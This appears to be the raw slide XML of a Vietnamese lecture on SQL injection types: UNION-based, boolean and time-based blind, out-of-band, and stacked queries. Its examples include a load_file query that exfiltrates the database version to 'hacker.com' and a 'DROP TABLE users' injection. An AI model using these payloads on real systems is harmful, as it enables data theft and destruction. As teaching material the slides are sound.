              <a:spcBef>
                <a:spcPts val="605"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="CC9900"/>
              </a:buClr>
              <a:buSzPct val="65000"/>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="446405" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" spc="-40" dirty="0"/>
              <a:t>Vi phạm: Một cuộc tấn công SQL Injection thành công, lấy được dữ liệu người dùng (email, mật khẩu), là ví dụ điển hình về vi phạm tính bảo mật</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" u="heavy" dirty="0">
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="CC9900"/>
                  </a:solidFill>
                </a:uFill>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="3000" dirty="0">
              <a:latin typeface="Wingdings"/>
              <a:cs typeface="Wingding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1524C-30F2-E85E-6582-788A8187540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F291A2-4BA8-B376-847F-777534888B4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A0F5DAB1-ECF5-A1E0-6873-A55EBB85865B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="295478"/>
            <a:ext cx="8686800" cy="3244478"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t>Dạng 1: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>Tấn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>công</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> SQL Injection </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>trong</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>Băng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>Tần</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> (In-band SQL Injection)</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849533CC-0F51-1674-DE35-C8198F68540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30</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{62B8285C-6AC5-57FF-12DA-B28C0CD7CECE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="114300" y="2333216"/>
            <a:ext cx="8915400" cy="2413480"/>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Kỹ thuật dựa trên UNION (UNION-based SQL Injection): </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Sử dụng toán tử UNION SELECT để kết hợp truy vấn hợp pháp với truy vấn độc hại, trích xuất dữ liệu từ các bảng khác (ví dụ: information_schema.tables).</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="529728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4628B-8834-E5F2-B152-B95AF780ECF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4367D42-5EB8-C5B0-F506-BB8AD9B677AC}"/>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767A5822-2CAC-04F7-9CB8-88506EC18870}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="295478"/>
            <a:ext cx="8686800" cy="2598147"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t>Dạng 2: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>Tấn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>công</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> SQL Injection </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>Mù</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> (Blind SQL Injection): </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0FB33AC4-9F9D-3269-AEE4-82717C6A072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31</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F73143F6-BEB0-B204-204F-DE5A6F7634A3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="114300" y="2333216"/>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Kết quả truy vấn không được trả về trực tiếp, kẻ tấn công suy luận thông tin bằng cách quan sát dấu hiệu gián tiếp.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2897739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0170D-BFD3-B647-1E0C-893E944C7F6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8B9928A-A412-60C2-3CC5-9C1E0D5A34D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C856DC4-615D-B3A1-1DAA-B136280F63B0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="295478"/>
            <a:ext cx="8686800" cy="2598147"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t>Dạng 2: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>Tấn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>công</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> SQL Injection </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>Mù</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> (Blind SQL Injection): </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8641288B-18B0-531C-1AD6-60ABCB6E7CC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32</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E547E372-EDF1-CA05-7746-EEDFEF31B8BE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="195649" y="1890028"/>
            <a:ext cx="8915400" cy="317266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Kỹ thuật Dựa trên Boolean (Boolean-based Blind SQL Injection): </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Gửi các truy vấn trả về Đúng/Sai và quan sát sự khác biệt trong phản hồi của ứng dụng</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Ví dụ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1"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and</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length</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database</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200" b="1" kern="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4</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200" b="1"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vi-VN" sz="3200" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="32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200" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Nếu phản hồi là TRUE (ví dụ: hiển thị nội dung), kẻ tấn công biết độ dài tên là 4.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" b="1"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322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C06E3-0D7C-0678-D6B0-1F62AABD72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FAFE750-F687-4337-4671-CB8D305EA31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B03D0335-ABD4-8C9D-CD60-113F3DA12DE4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="295478"/>
            <a:ext cx="8686800" cy="2598147"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t>Dạng 2: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>Tấn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>công</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> SQL Injection </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>Mù</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> (Blind SQL Injection): </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C345F7AC-6B8D-6CEC-A148-CC41EAB9C10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33</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{18178355-2933-6E35-1814-612EFF691998}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="195649" y="1890028"/>
            <a:ext cx="8915400" cy="271099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Kỹ thuật Dựa trên Thời gian (Time-based Blind SQL Injection): </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Gửi truy vấn chứa hàm tạm dừng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ví dụ: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1"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AND</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sleep(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" kern="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10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="32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200" b="1"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3200" b="1" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="008000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>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200" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Nếu máy chủ mất 10 giây để phản hồi, lỗ hổng tồn tại.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200"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2245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E9253-89F5-5FAC-B506-9C43B897597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7792E62-8982-78DB-19A7-41F7DDB39EA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A65B9F9-EC56-606F-2C57-108749E40D82}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="295478"/>
            <a:ext cx="8686800" cy="3244478"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t>Dạng 3: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>Tấn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>công</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> SQL Injection </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>Ngoài</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>Băng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>Tần</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> (Out-of-Band SQL Injection - OOB):</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F8065405-7F85-17C0-4AC6-F30CC731EA2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34</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A6FFC370-C273-C352-FDDC-409A4C1AF7B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="201827" y="2090799"/>
            <a:ext cx="8915400" cy="1582483"/>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Buộc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3200" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>CSDL gửi dữ liệu ra một kênh ngoại vi (ví dụ: yêu cầu DNS hoặc HTTP) đến máy chủ của kẻ tấn công.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" b="1"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74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7DBFE-2434-00B3-F301-8B38BF59A59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911CDB-2839-87E4-64F1-BA720B5A60D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F0C03231-4639-8DC8-BBE4-0DBC66D77591}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="295478"/>
            <a:ext cx="8686800" cy="3244478"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t>Dạng 3: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>Tấn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>công</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> SQL Injection </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>Ngoài</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>Băng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>Tần</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> (Out-of-Band SQL Injection - OOB):</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US"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4F62730A-3EAE-CFAD-4725-DCBF1918537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35</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F8E7D56-20A4-4361-7B3D-D9D51091F1E6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="201827" y="2090799"/>
            <a:ext cx="8915400" cy="343940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Ví</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>dụ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" kern="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30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0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select</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="30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000" b="1"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load_file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="30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000" b="1"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concat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="30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000" b="1"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0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000" b="1"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version</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="30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3000" b="1"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'.hacker.com\\s.txt’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1"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Truy vấn này buộc cơ sở dữ liệu thực hiện một yêu cầu chia sẻ tệp (hoặc DNS lookup) có chứa phiên bản cơ sở dữ liệu (version()) được nhúng vào tên miền mà kẻ tấn công đang lắng nghe (.hacker.com)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3000" b="1"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245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F14A8-33DC-460A-ABDF-B3D6188B2C7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A631CF-FE03-7063-0914-017D4CCC3E5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ED1F0A1-DFCE-5F12-CCF9-B6DDB26D5F8D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="295478"/>
            <a:ext cx="8686800" cy="1951816"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t>Dạng 4: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>Tấn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>công</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>Dựa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>trên</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> Stacked Queries (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>Chồng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>Lệnh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t>): </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" spc="-20" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="vi-VN" spc="-20" dirty="0"/>
            </a:br>
            <a:endParaRPr spc="-20" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E60D96C-E864-C4FD-2D23-4055D6FFA5E3}"/>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36</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{399E0E81-9BCC-DDDD-4BAE-A62A2488070A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="195649" y="1616150"/>
            <a:ext cx="8915400" cy="3603550"/>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Dùng dấu chấm phẩy (;) để thêm một hoặc nhiều lệnh SQL hoàn toàn mới, thường là lệnh phá hủy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Ví</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>dụ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="320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SELECT</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320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WHERE</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id=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" kern="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DROP</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TABLE</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users; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200"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Câu lệnh này sẽ tìm kiếm dữ liệu đầu tiên, sau đó thực thi lệnh DROP TABLE users để xóa toàn bộ bảng người dùng.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3000" dirty="0">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1174199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DE575-86AC-43DA-EEFC-123ACD77541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51E5D6A-6173-854A-C700-AFE76E66E42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AC1006F2-4C07-DC86-CE57-D3E253DC2EFE}"/>
